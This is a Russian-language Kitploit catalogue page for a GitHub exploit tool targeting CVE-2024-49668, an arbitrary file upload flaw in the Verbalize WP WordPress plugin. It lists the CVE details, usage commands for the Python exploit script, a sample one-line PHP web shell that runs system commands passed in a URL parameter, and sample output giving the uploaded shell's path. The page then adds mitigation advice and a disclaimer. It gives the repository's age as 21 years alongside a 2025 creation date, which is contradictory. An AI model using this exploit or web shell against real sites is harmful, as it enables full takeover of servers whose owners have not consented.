Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-49668 — WordPress плагин Verbalize WP <= 1.0 - уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-49668
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-49668

CVE-2024-49668

WordPress плагин Verbalize WP <= 1.0 - уязвимость произвольной загрузки файлов

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2024-49668: Уязвимость произвольной загрузки файлов в плагине Verbalize WP для WordPress

📋 Обзор

CVE-2024-49668 — критическая уязвимость в плагине Verbalize WP для WordPress версии 1.0 и ниже. Эта уязвимость позволяет неавторизованным злоумышленникам загружать произвольные файлы, включая веб-шеллы, на веб-сервер. Проблема возникает из-за недостаточной проверки входных данных и ограничений на типы файлов при загрузке.

Подробности

  • Опубликовано: 2024-10-23
  • Обновлено: 2024-10-23
  • Название: Плагин Verbalize WP для WordPress <= 1.0 — уязвимость произвольной загрузки файлов
  • Описание: Уязвимость неограниченной загрузки файла с опасным типом в Admin Verbalize WP, позволяющая загрузить веб-шелл на веб-сервер. Эта проблема затрагивает Verbalize WP с n/a по 1.0.
  • CWE: CWE-434: Неограниченная загрузка файла с опасным типом
  • Оценка CVSS: 10.0 (Критическая)
  • Векторная строка: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ Эксплойт-скрипт

Этот скрипт на Python использует уязвимость CVE-2024-49668 для загрузки файла-оболочки на целевой сайт WordPress через плагин Verbalize WP.

Возможности

  • Автоматическая проверка уязвимости: Скрипт проверяет, уязвим ли целевой сайт, сверяя версию плагина в readme.txt.
  • Загрузка файла: Загружает PHP-файл-оболочку на целевой сайт.
  • Извлечение пути: Извлекает и отображает полный путь к загруженному файлу-оболочке.

🧰 Требования

  • Python 3.x
  • библиотека requests

Установите требуемую библиотеку с помощью pip:

root@kitploit:~
pip install requests

🚀 Использование

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Execute a POST request to a WordPress site.

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target URL
  -s, --shell SHELL  Shell code to upload

Пример

По умолчанию скрипт загружает PHP-оболочку, которая выполняет phpinfo().

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

Вы также можете указать собственный PHP-код оболочки для загрузки:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 Вывод скрипта

root@kitploit:~
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi

📚 Дополнительная информация

Влияние уязвимости

Уязвимость CVE-2024-49668 позволяет злоумышленникам получить полный контроль над целевым сервером путём загрузки вредоносных файлов. Эксплуатация этой уязвимости может привести к серьёзным последствиям, включая утечку данных, несанкционированный доступ и возможную порчу веб-сайта.

Рекомендации по устранению уязвимости

Для защиты вашего сайта WordPress от этой уязвимости рекомендуется:

  • Обновить плагин Verbalize WP до последней версии, в которой исправлена эта проблема.
  • Внедрить строгие проверки при загрузке файлов, чтобы ограничить типы и размеры файлов.
  • Регулярно отслеживать журналы сервера на предмет подозрительной активности.

Правовой отказ от ответственности

Данный инструмент предназначен исключительно для образовательных целей. Несанкционированное использование этого инструмента против веб-сайтов без явного разрешения владельца является незаконным. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.


Создано 2025-03-22 Nxploited , Khaled alenazi

Скачать инструмент